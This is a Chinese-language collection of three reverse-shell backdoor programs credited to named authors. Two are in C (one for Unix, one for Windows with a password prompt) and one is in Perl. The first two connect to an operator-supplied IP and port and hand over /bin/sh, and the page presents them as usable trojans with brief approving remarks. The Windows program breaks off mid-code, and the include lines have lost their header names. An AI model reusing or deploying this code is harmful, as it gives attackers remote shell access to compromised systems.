第一个反弹木马代码:作者 iceblood
代码
#include
#include
#include
#include
#include
#include
#include
void usage();
char shell[]="/bin/sh";
char message[]="s8s8 welcome\n";
int sock;
int main(int argc, char *argv[]) {
if(argc <3){
usage(argv[0]);
}
struct sockaddr_in server;
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Couldn’t make socket!\n"); exit(-1);
}
server.sin_family = AF_INET;
server.sin_port = htons(atoi(argv[2]));
server.sin_addr.s_addr = inet_addr(argv[1]);
if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) {
printf("Could not connect to remote shell!\n");
exit(-1);
}
send(sock, message, sizeof(message), 0);
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl(shell,"/bin/sh",(char *)0);
close(sock);
return 1;
}
void usage(char *prog[]) {
printf("\t\ts8s8 connect back door\n\n");
printf("\t sql@s8s8.net\n\n");
printf("Usage: %s \n", prog);
exit(-1);
}
显得有点简陋了,不过还能讲究的过去。。如果需要可以写成LKM,呵呵。
第二个反弹木马代码:作者cnhackTNT
代码
#!/usr/bin/perl
#http://www.s8s8.net
#cnhackTNT[AT]hotmail.com
use strict;
use Socket;
use Cwd;
use IO::Handle;
if ( @ARGV < 1 ) {
print <<"EOF";
usage:
nc -l -p PORT(default 66666) on your local system first,then
Perl $0 Remote IP Remote_port(default 66666)
Type ’quit’ to exit or press Enter to gain shell when u under the ’S8S8 console’.
Enjoy ur shell!
Welcome to http://www.s8s8.net
EOF
exit;
}
my $remote = $ARGV[0];
my $remote_port = $ARGV[1] || 66666;
my $proto = getprotobyname(’tcp’);
my $pack_addr = sockaddr_in( $remote_port, inet_aton($remote) );
my $path = cwd();
my $shell = ’/bin/sh -i’;
socket( SOCK, AF_INET, SOCK_STREAM, $proto ) || die "socket error: $!";
STDOUT->autoflush(1);
SOCK->autoflush(1);
connect( SOCK, $pack_addr ) || die "connection error : $!";
open STDIN, ">&SOCK";
open STDOUT, ">&SOCK";
open STDERR, ">&SOCK";
print "You are in $path\n";
print "Welcome to www.s8s8.net\nEnjoy ur shell.\n\n[S8S8 console]>";
while () {
chomp;
if ( lc($_) eq ’quit’ ) {
print "\nWelcome to www.s8s8.net";
print "\nByeBye~~~!\n";
exit;
}
elsif ($_) {
system($shell);
print "\n[S8S8 console]>";
}
else {
print "\n[S8S8 console]>";
}
}
close SOCK;
exit;
很简单,功能和上面sql兄那个c版本的差不多。
第三个反弹木马代码:作者dahubaobao
代码
#include
#include
#include
#include
#include
#pragma comment (lib,"ws2_32.lib")
#define PASSSUCCESS "Password success!\n"
#define PASSERROR "Password error.\n"
#define BYEBYE "ByeBye!\n"
#define WSAerron WSAGetLastError()
#define erron GetLastError()
VOID WINAPI EXEBackMain (LPVOID s);
//BOOL EXEBackMain (SOCKET sock);
int main (int argc, TCHAR *argv[])
{
SOCKET sock=NULL;
struct sockaddr_in sai;
TCHAR UserPass[20]={0}; //用户设置密码缓冲
TCHAR PassBuf[20]={0}; //接收密码缓冲
TCHAR PassBanner[]="\nPassword:";
TCHAR Banner[]="---------dahubaobao backdoor---------\n";
if (argc!=4)
{
fprintf(stderr,"Code by dahubaobao\n"
"Usage:%s [DestIP] [Port] [Password]\n",argv[0]);
return 0;
}
sai.sin_family=AF_INET;
//判断参数合法性,并填充地址结构
//IP地址不能大于15
if (strlen(argv[1])<=15)
sai.sin_addr.s_addr=inet_addr(argv[1]);
else
{
#ifdef DEBUGMSG
printf("Internet address no larger than \"15\"\n");
#endif
goto Clean;
}
//端口不能小于0 && 大于65535
if (atoi(argv[2])>0&&atoi(argv[2])<65535)
sai.sin_port=htons(atoi(argv[2]));
else
{
#ifdef DEBUGMSG
printf("Port no less than \"0\" and larger than \"65535\"");
#endif
goto Clean;
}
//密码最大16位
if (strlen(argv[3])<=16)
strcpy(UserPass,argv[3]); //复制密码
else
{
#ifdef DEBUGMSG
printf("Please connect password error\n");
#endif
goto Clean;
}
while (TRUE)
{
WSADATA wsadata;
BOOL ThreadFlag=FALSE;
DWORD ThreadID=0;
int nRet=0;
nRet=WSAStartup(MAKEWORD(2,2),&wsadata); //初始化
if (nRet)
{
#ifdef DEBUGMSG
printf("WSAStartup() error: %d\n",nRet);
#endif
return 0;
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (sock==INVALID_SOCKET)
{
#ifdef DEBUGMSG
printf("socket() GetLastError reports %d\n",WSAerron);
#endif
goto Clean;
}
